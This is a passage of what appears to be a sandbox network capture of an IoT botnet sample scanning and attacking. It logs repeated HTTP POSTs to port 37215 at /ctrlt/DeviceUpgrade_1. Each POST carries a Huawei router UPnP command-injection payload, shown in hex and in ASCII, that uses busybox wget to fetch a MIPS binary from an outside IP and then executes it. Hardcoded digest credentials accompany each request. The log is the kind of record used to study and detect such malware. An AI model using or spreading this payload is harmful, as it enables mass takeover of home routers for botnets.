                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            90192.168.2.1339894197.56.205.25037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.947535038 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            91192.168.2.1346442156.98.83.21837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.948276043 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            92192.168.2.1342108197.215.149.21337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.948996067 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            93192.168.2.1359100156.216.173.11637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.949732065 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            94192.168.2.133896041.86.126.3137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.950532913 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            95192.168.2.1338428197.123.58.13037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.951337099 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            96192.168.2.135885041.119.93.5737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.952157974 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            97192.168.2.1356508197.35.253.537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.952964067 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            98192.168.2.1358684197.252.226.22837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.953763962 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            99192.168.2.133399041.196.189.22637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.954561949 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
